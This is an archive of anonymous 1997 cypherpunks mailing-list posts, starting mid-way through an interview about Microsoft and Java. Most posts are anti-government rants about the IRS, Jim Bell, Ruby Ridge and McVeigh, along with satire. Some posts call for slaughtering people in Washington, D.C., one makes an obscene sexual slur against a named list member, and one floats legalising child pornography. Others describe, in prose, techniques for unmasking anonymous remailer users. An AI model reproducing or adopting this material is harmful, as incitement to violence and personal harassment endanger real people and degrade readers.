     the two. Let's be clear on that.' "
     CW: Do you think you're going to end up fragmenting the language even
     more?
     Maritz: Not the language. You're making the mistake. You're falling
     into their mind-set -- [ignoring] the difference between Java the
     language from Java the class libraries.
     CW: But in the end result, a network manager will have to make sure
     he has both sets of class libraries.
     Maritz: Let me ask you this question: The fact that you can call
     Windows [application programming interfaces] from C++, did that
     splinter C++? It did not. It's the same issue.
     CW: But if Java's promise is that it'll be a cross-platform
     language --      Maritz: No. No. Sun's trying to make it that.
     CW: But say there's an electronic-commerce application that somebody
     wants to run cross-platform, and that's why they picked Java. And
     they use the JFCs to write it.
     Maritz: Good luck.
     CW: It's not going to run in Internet Explorer.
     Maritz: It may or may not. But the point is, that's Sun's problem.
     It's not our problem.
     CW: Does it end up being companies' problems, too? Are you saying
     they're foolish for buying into the theory that there can ever be
     cross-platform language?
     Maritz: No. We're saying it's no different from any other
     cross-platform [strategy]. This isn't the first one -- [there was]
     CBT, Appware, etc. We're just saying that, 'Hey, you should realize
     that when you're doing that, you're dependent upon Sun to get it to
     work.'
     CW: But if you bought into the JFCs, then you wouldn't be in this
     particular case. If you shipped JFCs, you'd help foster the idea of
     cross-platform.
     Maritz: And I don't want to ship another operating system on top of
     our operating system and burden every copy of Windows with all of
     that extra weight.
     CW: Do you agree that it makes developers have to make choices and
     it makes them have to do more work and it makes companies have to
     install both sets of classes? So in the end, it makes life difficult
     for everyone, doesn't it?
     Maritz: But we think that that's reality, because you either get this
     thing to become a heavyweight thing, in which case it's going to
     perform badly. Or you have to make it something very small. So we're
     not trying to be parties to perpetuating the myth.

@_date: 1997-08-15 16:36:49
@_author: Anonymous 
@_subject: Sign up on YoungSluts click thru Program 
Use your Mr. C. Punks credit card to sign up, and send the password
to the list.
  Be assured that I, for one, only use the XXX-rated accounts for valid
Stegonongraphy research.

@_date: 1997-08-15 19:08:29
@_author: Anonymous 
@_subject: Toilet plungers and sodomy: Why we should trust police blindly 
I expect to receive an email from "News of the Weird" any day
now, announcing that they are going out of business because they
can no longer compete with the "normal" weird news that is becoming
standard fare in the main press.
  What bothers me is that there seems to be an amazing number of
people who have developed the ability to watch the unceasing parade
of freedom-fucking, fascist insanity that marches across their field
of vision each day, and manage to block it from their consciousness
by telling themself that everything is going to be OK, as soon as
we get a few more laws to rid the planet of drug-dealing pedophiles.
  I would like to see Janet Reno and Louis Freeh announce a press
conference and tell the citizens, "...and the minute we have all of
the drug-dealing pedophiles in prison, we're going to see if we can't do something about those cops that are shoving toilet plungers
up the citizen's assholes."
  Priorities. We have to have priorities.

@_date: 1997-08-15 19:10:01
@_author: Anonymous 
@_subject: Cartel Leaders Set Snipers To Work In Border War 
A major thrust of the article deals with the government promotion
of the idea that the "bad guys" have actively declared war upon agents
of the U.S. government, on U.S. soil.
  Strange that this claim should come from a variety of sources at
the same time the government is facing the embarassment of having to
whitwash the actions of heavily armed, camouflaged Marines who felt
so threatened by a goat-herder with a .22 rifle that they slaughtered
him with their M-16's, despite the fact that the child was an American
citizen, doing what he had every right to do, on American soil.
  The drug cartels are having such little trouble getting drugs into
the U.S. that cocaine and heroine are cheaper than a bottle of good
Scotch, yet, according to the government, they have decided that it is necessary to perform actions which will "force" the government
to 'crack down' on border terrorism with increasing use of armed
force. Right...
  I bet the child pornography cartels are arming themselves, even as we speak, preparing to join the drug cartels in their war against
the U.S. governement. We'd better send some Marines to Denver, New
York City, and Fargo. Then everybody but the high-school goat herders
will feel much safer, I'm sure.
"There is something wrong when U.S. armed forces murder American
 schoolchildren on American soil, under an increasing number of
 unconstitutional laws."

@_date: 1997-08-15 19:32:09
@_author: Anonymous 
@_subject: "Morphed" child porn case ruling text (FSC v. Reno) 
Question: "If someone did a study that conclusively proves that free
  availability of child pornography leads to a substantial decrease
  in the amount of child abuse taking place, will our legislators and
  our ministers support the legalization of child pornography?
Answer: "Right... And I'm the fucking pope..."
  When did protecting abused children become such a high priority
for the fascists? When people told them to shove their fascism under
the banner of "moral values" up their ass.
  If we wipe drug abuse and child abuse from the face of the earth,
the fascists will decide that pictures of naked people cause tooth
decay, and launch a "War Against Bad Dental Hygiene." Of course,
this will mean that Law Enforcement will need the power to check
inside our mouths at their every whim, and imprison people who have
dental cavities.
"I am not a mushroom..."

@_date: 1997-08-15 20:51:15
@_author: Anonymous 
@_subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus 
Maybe you should stop being such an asshole to those children.

@_date: 1997-08-15 21:04:36
@_author: Anonymous 
@_subject: McVeigh to die, quotes Brandeis 
And the morning news anchor on CBS tells the country, "McVeigh's
statement is open to a wide variety of conflicting interpretations."
  (I guess he hasn't been following the news too closely.)
  Did anyone else on the CypherPunks list interpret McVeigh's statement
to mean that the people should lie, steal, and oppress others, or am I
the only one who interpreted it this way?
  Or perhaps he meant we should murder anyone who claims to be Jesus,
as well as the men, women and children who believe in him.
  Been there, done that...
Pontius Pilate

@_date: 1997-08-16 00:47:00
@_author: Anonymous 
@_subject: No charges for Ruby Ridge murderers 
investigation into whether the FBI's former deputy director tried to
obstruct an inquiry into the deadly 1992 seige at Ruby Ridge, Idaho,
saying it lacked evidence to bring criminal charges, governent officials
FBI Deputy Director Larry Potts or Danny Coulson, Potts' deputy during the
1992 seige at the remote cabin of white supremacist Randy Weaver, said
government officials who spoke on condition of anonymity.
The Justice Department informed lawmakers and lawyers for the FBI agents
that its review did not warrant any further criminal charges, but it left
open the possibility of disciplinary action.
Press, "The available evidence does not support further criminal
prosecution of FBI officials ... from the August 1992 incident at Ruby

@_date: 1997-08-16 01:00:51
@_author: Anonymous 
@_subject: Reducing Crypto-Anonymous Crime by 50% 
It seems to me that many of the government's fascist goals for
stopping strong crypto and anonymous financial transactions could
be realized merely by whacking out Alice and Bob.
  An analysis of the cypherpunks list archives shows that most of
the undesirable activities being perpetrated in the crypto-anonymity
arena are the result of a conspiracy between Alice, Bob, and their
shady friends.
  Anybody know their last names?
A Concerned Cititzen

@_date: 1997-08-16 18:04:15
@_author: Anonymous 
@_subject: state power in cyberspace convention 
...   I think you should go to the conference.
  As a matter of fact I have already prepared a package I would like you
to take along with you. It should be hand-carried on the plane so that
it will not be bumped about during your flight.
  Details to follow.

@_date: 1997-08-17 12:10:48
@_author: Anonymous 
@_subject: Remailer hating Nazis 
There are lots of good reasons to use remailers, but thinking that you are
not responsible for your actions is not one of them.  Anything you send
may be around to haunt you for many years to come. If you believe that any computer sytem is foolproof... you have a lot to
learn.  There is always a possibility that people will found out your real
identity and where you live, through a human error or a flaw in the
remailer.  (Right, toto?). There are easier and safer ways:  get some exercise, or check out a porno
site, or go to a rifle range, or write a reply but don't send it. Greets to all my friends in domestic surveilance.

@_date: 1997-08-17 14:33:35
@_author: Anonymous 
@_subject: Degausser 
Tim C[reep] Mayflower will fuck anything that moves, but he'd rather be
fucking his own mother's dead body.
         __o
       _ \<_  Tim C[reep] Mayflower
      (_)/(_)

@_date: 1997-08-17 15:14:28
@_author: Anonymous 
@_subject: Suitable for viewing by "Foals" (as rated by Tim C. May) 
* Paul Millhouse, 49, pleaded not guilty in February to assault on
an animal after he was arrested in Lakeside, Calif., near San Diego. He is suspected of being the man sought for 11 years for various
horse stalkings (the very first one of which was reported to police
by Joan Embery, the San Diego Zoo spokesperson who frequently
appeared on The Tonight Show Starring Johnny Carson). According to police in the latest incident, Millhouse was videotaped
entering a private pasture, taking off his clothes, and fondling a

@_date: 1997-08-17 15:15:49
@_author: Anonymous 
@_subject: Shakespearean Conspiracy / Re: FCPUNX:McVeigh on McVeigh 
Keep in mind that you should first remove all works of Shakespeare
from your possession, since possession of them could lead to the
filing of conspiracy charges against you.
  It might also draw the cypherpunks into the web of conspiracy from
the point of view of the broad, unconstitutional laws covering this
area, since Shakespeare was a cypher-punster. (I hope no one on the
list has been exporting the works of Shakespeare without an export

@_date: 1997-08-17 15:18:19
@_author: Anonymous 
@_subject: ASSETS FORFEITURE BILL ON THE MOVE 
X-Mailer: WinSock Remailer Version ALPHA1.3B
X-Comments: -
X-Comments: "I am not an asshole, but I play one in real life."
X-Comments: -
X-Comments: "If you can't say something nice about someone...
X-Comments: ...piss on 'em."
X-Comments: -
X-Comments: This message is NOT from CypherPisser.
X-Comments: It was sent by an automated anonymous asshole under the
X-Comments: auspices of the Electronic Forgery Foundation.
X-Comments: -
X-Comments: Note: Send any complaints about abuse of this remailer X-Comments: to the person most concerned about your rights and
X-Comments: freedoms. (Hint: It's a "mirror" site.)
X-Comments: -
X-Remailer-Setup: Maximum Message Size -- None
X-Remailer-Setup: Reordering is OFF
X-Remailer-Setup: News Posting DISABLED
X-Remailer-Setup: Subject Header KEPT
X-Remailer-Setup: Logging COMPLETE Messages
X-Remailer-Setup: PGP and plaintext messages accepted
Anon-To: cypherpunks at toad.com
  Is it time to kill these fuckers, yet?
  Does anybody know what the secret signal is for us to descend
on D.C. en masse and slaughter every living soul in the defense
of freedom? (or merely on a whim?)
  Is the 'secret signal' when the sun comes up in the morning?
That works for me!

@_date: 1997-08-17 15:19:03
@_author: Anonymous 
@_subject: Vote 'Till It Hurts! 
WEIRDNUZ.491 (News of the Weird, July 4, 1997)
by Chuck Shepherd
* Lewis Ecker II, a diagnosed sexual sadist, was turned down in his
release bid from St. Elizabeth's Hospital in Washington, D. C., in
December even though he has made considerable improvement
during his stay, even winning elective office in D. C. in 1990 (and
being re-elected twice since) as an Advisory Neighborhood
Commissioner.  However, according to hospital officials, Ecker
hurt his chances of release by secretly composing 21 sexual-sadist
narratives (discovered in a search of the office he had been given
the privilege of using) that featured himself as the protagonist who
humiliated and injured female victims.

@_date: 1997-08-18 10:51:23
@_author: Anonymous 
@_subject: Nothing Accumulation Separation All 
Thee InterNet is not a collection of machines, but a social
relation among people, mediated by *nothing*.
Thee InterNet is capital to such a degree of *accumulation*
that it becomes a machine.
Thee InterNet which eliminates all geographical distance reproduces distance internally as spectacular *separation*.
InterNet theory is now the enemy of *all* InterNet ideology
and knows it.

@_date: 1997-08-18 16:51:19
@_author: Anonymous 
@_subject: Remailer hating Nazis 
Right, small, warm-blooded creature.
  There are a plethora of available avenues for surruptitious agents to
exploit InterNet technology and methodology in order to reveal both your
identity and the content of your communications.
  To truly achieve anonymity and privacy, one should be prepared to use
the strictest standards of paranoia, the full capabilities of privacy
and anonymity tools, and personal methodologies aimed at thwarting
unlikely and/or impossible surveillance techniques as well as the
currently known methods.
  Beyond the mere technology itself, one must consider the possibile
use of psychological manipulation of individuals and groups into a
specific mindset that, combined with an analysis of the individual's
natural psychological profile, can enable a surreptitious entity to
move the individual toward patterns or processes which will make
the technological tools of identity and information analysis more
 For example, take the fictitious case wherein an individual is prone
to using only two different remailers, say, for instance, the remailer
at c2net and the remailer at dhp.com.
 Suppose that the remailer at c2net was being monitored surreptitiously
by an agent who had access to their system, but either had no way to access messages encrypted to the remailer, or their efforts to monitor the remailer seemed to be thwarted at times by another, unknown entity
with access to the system.
  The surreptitious agent could arrange to have the c2net remailer shut
down under some pretext, and seed the monitored individual's private
email, mailing lists, and newsgroups with subtle pointers/suggestions
as to the reliability/security, etc., of another remailer which was
more securely under the agent's control, say, for instance, a remailer
at replay.com.
  After the monitored individual has begun using the remailer at
replay.com, then the agent would proceed to do the same thing in regard
to the remailer at dhp.com, and another remailer controlled by the
agent or associates of the agent, say, for instance the remailer at
  The agent is now in a postion to have the majority of the monitored
individual's communications vulnerable to identity, information and
traffic analysis, and thus will have an enormous amount of information
to work with should the individual occasionally spread their anonymous
communications through remailers that the agent may have less complete
access to.
  If we suppose that the agent also is able to manipulate the monitored
individual into sending the agent email that is encrypted to several
recipients, including the agent or the agent's associates, then we see
that the agent now has an even broader database of known information
which can be analyzed to provide clues as to the identity of and the
information sent by others who communicate with the individual who is
being monitored.
  This fictitious example, if it came to pass, would serve to provide
information to the agent which could be used to more effeciently target those who would be subjected to more restricted forms of
surveillance, such as monitoring of the physical signals given off
by their computer, keyboard, and monitor.
  All in all, the small, warm-blooded creature is correct in implying
that one should always keep a shotgun by their computer, in the firm
knowledge that the dogs of war do not always bark to announce their
  And greets to all of my friends who are watching your friends.
Anonymous ReMonger

@_date: 1997-08-19 13:34:37
@_author: Anonymous 
@_subject: CBS 
* Something must be done.
 * This is something.
 * Therefore, we must do it.
 (Yes, Prime Minister?)

@_date: 1997-08-19 13:54:05
@_author: Anonymous 
@_subject: Remailer hating Nazis 
And even then one must never trust it completely.  An appropriate degree
of paranoia means that not only must one use all the appropriate tools and
techniques, but that one must be prepared for the possibility that the
tools may fail. Following is a fairly obvious scenario, but still perhaps interesting:
Imagine that an agent X wants to find out the real identity of
somebody posting under the pseudonym A.  X can retrieve the list
membership through the mailserver.
X composes a post to the list designed to elicit a response from A,
perhaps flaming A, or criticising something dear to A.  They prepare n
variations of the post by inserting different spacing, spelling, or
phrasing and keep track of each variation.  They post one variation to
each member, relayed through toad.com.
If X is lucky, A will reply to the post (not noticing the slightly
unusual header), quoting some of the original matter.  By looking at
the spelling etc in the quoted part X can determine which original
version A received and hence what address they use to read the list.
Now this is by no means certain to work: A might not reply, they might
not quote enough material to allow the original to be identified, or
they might notice that the mail is not really from the list.  Even if
X can associate the reply with an original, they have no really
conclusive evidence, but then...
It has, perhaps, only a ten percent chance of success, but this is
nevertheless significant.  If A is posting anonymously just for the
convenience of not having his/her email address dredged up by search
engines, or from broadly-based monitoring this is perhaps OK.  If A
writes against people or governments that might retaliate, then A
should at least consciously accept the risks.
Nicely put.
That's good to know.  Some of them need to be watched.
  "You will find that the State is the kind of organization which,
   though it does big things badly, does small things badly too."                                          -- John Kenneth Galbraith

@_date: 1997-08-19 15:51:12
@_author: Anonymous 
@_subject: The Real Bell Issue / Re: Bell, etc 
The following, from the Columbian, lies at the heart of the
real issue that Bell's persecution was all about.
  Every year, just before Income Taxes are due, the IRS picks out
a few people to unjustly persecute in order to strike fear into
the heart of the taxpaying sheeple.
  They always manage to completely fuck over a variety of citizens
in a manner that will generate maximum publicity at that time of
year. They always seem to include at least one fairly average
citizen who gets everything he owns seized, including bank accounts,
etc., over a tax dispute involving nickles and dimes. Those who
express outrage over these actions are the IRS's best friend.
  "They have no right to..."
  "They are out of control..."
  "They can do anything they want to you..."
  This is all music to the IRS's ears.
  Jim Bell was like manna from heaven for the IRS. It gave them an
opportunity to bring down the fascist forces of a wide variety of
government agencies to back the IRS's play in this instance.
  Bell's persecution was not a mistake, it was a loud and clear
message to the taxpaying sheeple that they are "a felon under an
increasing number of laws," and that the IRS has a plethora of
government agencies ready and willing to join them in fucking over anyone who gets out of line.
  And what is the IRS's definition of "getting out of line?":
  Apply for a tax refund and have every real or imagined sin you
have ever commited used against you.
  "A person who asked the IRS for a tax refund, had his home raided
today by 20 armed government terrorists from a wide variety of
government agencies.
  "This person who asked for a TAX REFUND has never been proven to
have anything to do with DRUGS such as METHAMPHETAMINE, and is not
known to be a SPEED FREAK or a DRUG DEALER. As well, government
agents investigating the person asking for the TAX REFUND have
never found any ILLEGAL DRUGS on his person or property, but the
person who asked for the TAX REFUND will be mentioned in connection
with DRUGS and METHAMPETAMINE, or SPEED, CRANK, etc., for the rest
of his life, every time he "comes to our attention" as a result
of asking for a TAX REFUND."
  I would not doubt that the IRS asked the local newspapers to put
a picture on their front page of 20 armed governement terrorists putting guns to the heads of Ma and Pa Bell, with Jim on the ground
with a boot at his throat, and a huge headline reading,
  "MAN ASKS FOR TAX REFUND!"
  The IRS spends the whole year going after people who they deem
to be guilty of tax evasion, and it is usually a fairly boring
affair involving accountants and lawyers.
  The weeks preceeding the date taxes are due to be filed are
reserved for high-profile cases which the sheeple can easily
recognize as persecution by a heartless agency with supreme power
at their disposal.
  The real issue in Bell's case is not just persecution, but easily
recognizable persecution. Otherwise, the whole Bell affair would be
  Perhaps, upon sentencing, we will see a headline,
  "MAN WHO ASKED FOR TAX REFUND IMPRISONED FOR HIGH SCHOOL PRANKS!"

@_date: 1997-08-20 08:38:37
@_author: Anonymous 
@_subject: Tim May in the news 
A hearty "up yers" is in order to them.
Yeah, perhaps teaching your kids what's wrong and right, to the best of
your ability, and no less, as a parent.  Perhaps also teaching them how not
to get sucked into a pedophile.
Sounds like an accident at first, but, well...
  Help win the fight against weak encryption!  Break RC5-56
 -----------|>    <|-------------
               Member of Starbase XII RC5 Team
  Free secure e-mail, a reality?  Yes! Pretty Good Privacy
      available at

@_date: 1997-08-20 09:01:23
@_author: Anonymous 
@_subject: The Real Bell Issue / Re: Bell, etc 
Sounds plausible enough.
The IRS (Internal Revenue Stealers) enjoys making examples of people who
dare to defy the income theft.
The blood-sucking variety.
  Help win the fight against weak encryption!  Break RC5-56
 -----------|>    <|-------------
               Member of Starbase XII RC5 Team
  Free secure e-mail, a reality?  Yes! Pretty Good Privacy
      available at

@_date: 1997-08-20 12:43:29
@_author: Anonymous 
@_subject: Anonymous Remailers 
fully struck down, EFGA is still involved in lawsuit against the state
over internet anonymity.  I actually don't contemplate another affidavit in this case,
but it may happen.  If I need to write another affidavit in support of the
remailer, I will only have about two weeks to get it done.
  Don't write an affidavit, write an indictment.
  Say, perhaps, an indictment of our founding fathers for their use of
as well as tacking a "use of crypto in commission of a crime" charge on
to the
  You can site Paul Revere's use of cryptography ("one if by land, two
if by
sea) to implicate the whole bunch in a drug dealing child pornography
Perhaps you might even want to trace the founding fathers' use of
and strong-lantern encryption to the moral corruption existing today.
"The founding father of drug dealing child pornography rings."

@_date: 1997-08-20 13:54:19
@_author: Anonymous 
@_subject: David Downey asks to be shot 
Better yet, let's shoot the people "needing protection."
  Once they're dead, there will be no need for all those laws
designed to protect them.
  What a brilliant idea! I'll probably get the Nobel Peace Prize
for this one!

@_date: 1997-08-20 13:58:30
@_author: Anonymous 
@_subject: Unclear on Bell / Re: The Real Bell Issue / Re: Bell, etc 
I am unclear on something.
  Did the government imprison without bail a citizen who evaded taxes
and made a government office smell bad, or did the government allow
a terrorist who was actively plotting to overthrow the government
to plead guilty to inconsequential charges?
  If I get arrested for plotting to Nuke D.C., should I hire Bell's
lawyer and try to get it reduced to jaywalking? Or should I avoid
jaywalking to prevent getting arrested for plotting to Nuke D.C.?

@_date: 1997-08-20 15:14:49
@_author: Anonymous 
@_subject: The Real Bell Issue / Re: Bell, etc 
The fact of the matter is, none of us know what Jim knows, and what
he knows is likely only what his government appointed schill has told
him. I recall Vin Suprynowicz mentioning a prominent attorney contacting
Bell's attorney in an effort to help, and receiving no reply.
  Neither do we know if Bell has merely decided that he should concede
the legal ground in order to be able to pursue the issue later, on
turf that suits him better.
  We have already seen the results of Tim McVeigh wanting his government
schill replaced--a big FUCK YOU.
  McVeigh's problem is not weakness, but lack of knowledge about the
legal system and the quality of his legal representation. Unfortunately,
I have no doubt that the government already has lawyers in place whose
job thus far has been to gain McVeigh's trust, so that they can screw
up his appeals, as well.

@_date: 1997-08-20 15:21:49
@_author: Anonymous 
@_subject: David Downey asks to be shot 
Pick it up under the bridge at midnight.
  Come alone...

@_date: 1997-08-20 15:46:47
@_author: Anonymous 
@_subject: bloodlust or game-theory? 
Kent Crispin finally came to his senses and described
government thusly:
  D.C. and the Pentagon, right?
  Yes, like Park Rangers with Uzi's, and Postal Service swat teams.
  As Tim May constantly reminds us, in regard to the cypherpunk list
  Glad to see that you're coming around, Kent, and finally recognizing
the government for the insider cult it has become.

@_date: 1997-08-20 18:33:50
@_author: Anonymous 
@_subject: PGP 5.0 
A pencil, a slide rule, and 40 trillion pieces of legal size paper.

@_date: 1997-08-21 05:17:33
@_author: Anonymous 
@_subject: The legitimate needs of law enforcement 
In 1938, five years after taking power, the Nazis enhanced the 1928 law. The Nazi Weapons Law introduced handgun control. Firearms ownership was restricted to Nazi party members and other "reliable" people.

@_date: 1997-08-21 05:22:01
@_author: Anonymous 
@_subject: Federalism 
Contrary to the Marxists, the Nazis did not advocate public owner-
ship of the means of production. They did demand that the government oversee and run the nation's economy. The issue of legal ownership, they explained, is secondary; what counts is the issue of control. Private citizens, therefore, may continue to hold titles to property, so long as the state reserves to itself the unqualified right to REGULATE the use of their property...
The Ominous Parallels:Leonard Peikoff

@_date: 1997-08-21 05:22:20
@_author: Anonymous 
@_subject: America is largely a Jewish nation 
The 1938 Nazi law barred Jews from businesses involving firearms. On November 10, 1938 -- one day after the Nazi party terror squads (the SS) savaged thousands of Jews, synagogues, and Jewish businesses throughout Germany -- new regulations under the Weapons Law specifically barred Jews from owning any weapons, even clubs or knives.

@_date: 1997-08-21 05:38:46
@_author: Anonymous 
@_subject: The Real Bell Issue / Re: Bell, etc 
prosecuting criminals, it was about scaring the shit out of 15 year olds.
First, many of the people raided under operation sundevil already KNEW that
they were going to be raided, or at least suspected. I myself was informed,
by some friends, some time before the raid that there was a DNR on my phone
line. I also recieved an anonymous phone call "warning" me to stay away
from "hackers". Second, the secret service agents actualy preforming the raid seemed to
view it as an elaborate joke after the figured out that the threat to
national security or whatever was 14 years old, in fact, the only agent
there that seemed to take it seriously was a postal inspector who solemly
informed me " your going to jail for a long time buddy" as the secret
service agents chatted about vaious trips to russia guarding reagan and
complimented me on how smart i must be. Third, their cell phones didnt work, and after calling the office to get
them to DTMF decode numbers in my speed dial, they never erased the redial
on my phone, leaving their office number there for me to DTMF decode myself. They seemed to ignore things that actualy WERE evidence and took things
like calulators and batteries ( they were really excited by the fact that
i had loads of batteries because early blue boxes used loads of power and
you needed to change batteries frequently). My lawyer couldnt get ANY information about the investigation and i never
recieved any calls and was never even questioned, dont you think that if
they were interested in breaking a worldwide conspiricy of hackers they
would have at least asked me a few questions? (besides what i used all the
batteries for). In any case, there is a HUGE difference between raiding the houses of some
14-15 year old computer geeks who actualy think they will be shot when they
are woken up by a secret service agent with a shotgun in their face and
still believe that an arrest for " computer crimes" will ruin their life
and at best has their very very irate parents to arrange for their defence
and raiding the house of an adult who knows what the effects of their
actions will be, which in computer crimes is just alot of attention, little
jail time, and a fat job when you get out. I almost wish i had gone to
trial, I would never have had to go to college to get a CS degree. BTW. about 3 years ago I recieved a call from the NYC secret service field
office , I thought at first they had finaly decided to arrest me. But what
in fact happened is that they decided to return all the computer equipment
siezed in the raid. They returned 2 huge boxes of now obsolete computers
and peripherals , complete with SS evidence tags saying " Location :
Bedroom , Sex: Male" , and SS disks in the 5 1/4 floppy drives  to potect the heads". Its a good thing they never realized that I gave my
then brand new 20 mb external hard drive to a friend with all the real
evidence on it untill after the raid. They also informed me that the
investigation was still underway and I should wait for further contact.

@_date: 1997-08-21 10:18:32
@_author: Anonymous 
@_subject: Bogus Libertarian Message / Re: (Fwd) Release: Texas & Ruby Ridge killings (fwd) 
It was a bogus message. I have a copy with a valid signature which I
have pasted below.
------- Forwarded Message Follows -------
-----BEGIN PGP SIGNED MESSAGE-----
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
For release: August 19, 1997
For additional information:
Tim C. May, Deputy Director of Communications
Phone: (202) 333-0008 Ext. 222
E-Mail: 76214.3676 at CompuServe.com
-----BEGIN PLP SIGNATURE-----
Version: 6.2.2
-----END PLP SIGNATURE-----

@_date: 1997-08-21 13:25:09
@_author: Anonymous 
@_subject: Remailer chaining 
Multiple Choice:
1) Chain all of your mail through Jam, then it will be like you
are both running no remailer.
2) Chail all of your incoming mail, except for that from Jam,
through Jam, then it will be like you are both running 1 remailer.
3) Put Jam's abuse address in your headers, then it will be like
Jam is running 2 remailers.
4) Put the Whitehouse address as the abuse address in your headers,
and write to let us know how Jim Bell is doing.

@_date: 1997-08-21 14:12:37
@_author: Anonymous 
@_subject: An end to "court appointed attorneys" 
Doritos, broken eggs and spilled milk are the key in-greed-ients
for Huevos Capitalist. (No onions, because of the spilled milk.)
  Poached eggs are the key in-thieve-ient for Huevos Socialist.
(No garlic, because blood-suckers are allergic to it.)
  (When people ask me what I brought to a pot-luck dinner, I tell
them I brought a pig's stomach.)

@_date: 1997-08-21 17:19:06
@_author: Anonymous 
@_subject: CypherPunk Cults / Re: An end to "court appointed attorneys" 
I am one of the "chosen." As a matter of fact, I am not only the Grand PoohBaah of the TruthMonger CypherPunk Cult, I am its
"sole" member.
  Black Unicorn is the "soul" member of the Black Unicorn CypherPunk
Cult, and its Grand Pooh-Baaa...Baaaa...Baaaa.
  Blanc Weber is the Grand PoohBroad of the Blanc Weber CypherPunk
Cult, even though her cult does not have a "member."
  I realize that it is difficult for someone who defines themself
by their position in the "group" or their membership in the "herd"
to truly conceive of perceiving life from the perspective of an
individual entity with social capabilities.
  If the cypherpunks mailing list is attacked in my presence, I may
well choose to join in circling the wagons, even if I am capable of
outrunning the attack, or I may choose to shout, "It's OK, I'm going
for help." as I ride off over the horizon to the nearest bar. And
later I may make the same or a different choice if the fight-
censorship list is attacked in my presence.
  The key word is "choice." As in "free."
  "Free...Choice"
  Am I missing something here? Does my brain make a connection between
these two words because of an electrical malfunction, or am I correct
in my assumption that these two concepts are closely related?
  "Voluntary...Mandatory"
  Buuzzzzzz!!!!!!!!!!!!!
  Oops! This combination causes a genuine short circuit, setting off all
kinds of bells, buzzers and flashing lights.
  (BAD COP! NO DONUT!!)
  To tell the truth, I "chose" myself as sole member and Grand PoohBah of the TruthMonger CypherPunk Cult because I *do* feel that I am "irrevocably different" from "those other unfortunate
creatures" that share a physical form similar to mine.
  Of course all of those other people are fucking idiots! That's
why I chose *me* to live my life, and not them. And I'm sure that
most of them feel the same. Have you ever sat down at watched the
world go by, viewing every passing person from the perspective of,
"What if I, in this body, were like them? Thought like them, liked
what they liked, hated what they hated, acted as they act."
  I've done that when I was on top of the world, and I've done that when I was in the gutter, and the answer was always the same.
  "Fuck those idiots! I'm *me*, not them!"
  Nothing personal, Kent, but if I had chosen you to live my life,
I think it would have been a bad mistake. And vice-versa, I am sure.
  Tim speaks of those who feel it is their duty/right to "collect
tribute from those who don't want to make the contribution freely."
  Do you feel he is "obligated" to pay tribute to the people who
show up on his doorstep wanting money to buy child sex-slaves? How
about Bibles? Fatty hamburgers? Lean Cuisine? Taxes?
  Somewhere in the world there is a child dying of hunger who could
be fed for a time if you sold your computer and bought food for the
child. But the child is *not* dying *because* you didn't sell your
computer and buy him/her food.
  The child is dying for the same reason that you and I are also
dying--because it was born. ("No One Gets Out Of Here Alive")
  Bill Gates is a Cult of One, and a starving child is a Cult of
One. Bill Gates is feeding a lot of people. Is he feeding *enough*
people? Ask him, I'm sure he'll tell you how *he* feels about it.
  Perhaps Bill Gates is "bleeding" a few people to survive in the
business jungle. Is he bleeding *too*many* people? Ask him, I'm
sure he'll tell you how he feels about it.
  Mother Teresa is a Cult of One. That is how many people she
eats for, in order to stay alive. Is she murdering a starving
child with every bite she takes? Do you also need a powerful microscope to find *her* heart?
  Years ago, the Reader's Digest had an ancedote about a small
rural town with only one house. When entering the "town" from
either side, there was a welcoming sign just like one sees in
many cities and towns across the nation.
  The sign read something like this:
             "Welcome to Smithville."
                 "Population 1"
              "Mayor -- Dave Smith."
           "Fire Marshall -- Dave Smith"
           "Town Treasurer -- Dave Smith"
  "Drive Carefully. The life you save could be Dave's."
  So it was not surprising to find out that Dave Smith is a CypherPunk.
(David E. Smith )
  Have you never noticed that it is called the cypherpunks mailing list?
                                                         ^
  Plural, Kent, plural. The name is plural in order to warn newcomers
to the list that we are not all "one" and that, despite the wishes of
Rodney King, we may not all "get along."   The word "we" is for use by Kings, Priests, and people with tapeworms.
I'm not adverse to striking a deal where you watch my back and I watch
yours, but if you are incapable of watching your own front, then it's
really not my problem.
  If Tim is low on ammo, he would probably find it in his best interest
to cover you while you make a break for yours. If he has plenty of ammo
he might *choose* to do the same, for his own reasons.
  I, for one, however, would not want to show up on his doorstep and
tell him he was *obligated* to cover me while I attempted to get back
the ammo I had given away when the government "required" it of me.
  It's not because I think he's heartless. It's because I *don't*
think he's *brainless*.
"Who will help me load my Uzi?" said the Little Red Hen.

@_date: 1997-08-22 08:16:46
@_author: Anonymous 
@_subject: Microsoft TV announces new TV Dinner product 
INSTRUCTIONS FOR MICROSOFT'S NEW TV DINNER PRODUCT
   :
   :  You must first remove the plastic cover.  By doing so you agree to
   :  accept and honor Microsoft rights to all TV dinners.  You may not
   :  give anyone else a bite of your dinner (which would constitute an
   :  infringement of Microsoft's rights).  You may, however, let others
   :  smell and look at your dinner and are encouraged to tell them how
   :  good it is.
   :
   :  If you have a PC microwave oven, insert the dinner into the oven.
   :  Set the oven using these keystrokes:   <\mstv.dinn.//08.5min at 50%heat//
   :  Then enter: <ms//start.cook_dindin/yummy\|/yum~yum:-)gohot
   :
   :  If you have a Mac oven, insert the dinner and press start. The
   :  will set itself and cook the dinner.
   :
   :  If you have a UNIX oven, insert the dinner, enter the
ingredients      :  the dinner (found on the package label), the weight of the dinner,
   :  and the desired level of cooking and press start.  The oven will
   :  calculate the time and heat and cook the diner exactly to your
   :  specification.
   :
   :  Be forewarned that Microsoft dinners may crash, in which case your
   :  oven must be restarted.  This is a simple procedure.  Remove the
   :  dinner from the oven and enter
   :  <ms.nodarn.good/tryagain\again/again.rats!.
   :  This process may have to
   :  be repeated.  Try unplugging the microwave and then doing a cold
   :  reboot. If this doesn't work, contact your hardware vendor.
   :
   :  Many users have reported that the dinner tray is far too big,      :  than the dinner itself, having many useless compartments, most of
   :  which are empty.  These are for future menu items.  If the tray is
   :  too large to fit in your oven you will need to upgrade your
   :  equipment.
   :
   :  Dinners are only available from registered outlets, and only the
   :  chicken variety is currently produced. If you want another
   :  call MicrosoftHelp and they will explain that you really don't
   :  another variety. Microsoft Chicken is all you really need.
   :
   :  Microsoft has disclosed plans to discontinue all smaller
versions      :  their chicken dinners.  Future releases will only be in the larger
   :  family size.  Excess chicken may be stored for future use, but
   :  be saved only in Microsoft approved packaging.
   :
   :  Microsoft promises a dessert with every dinner after '98. However,
   :  that version has yet to be released. Users have permission to get
   :  thrilled in advance.
   :
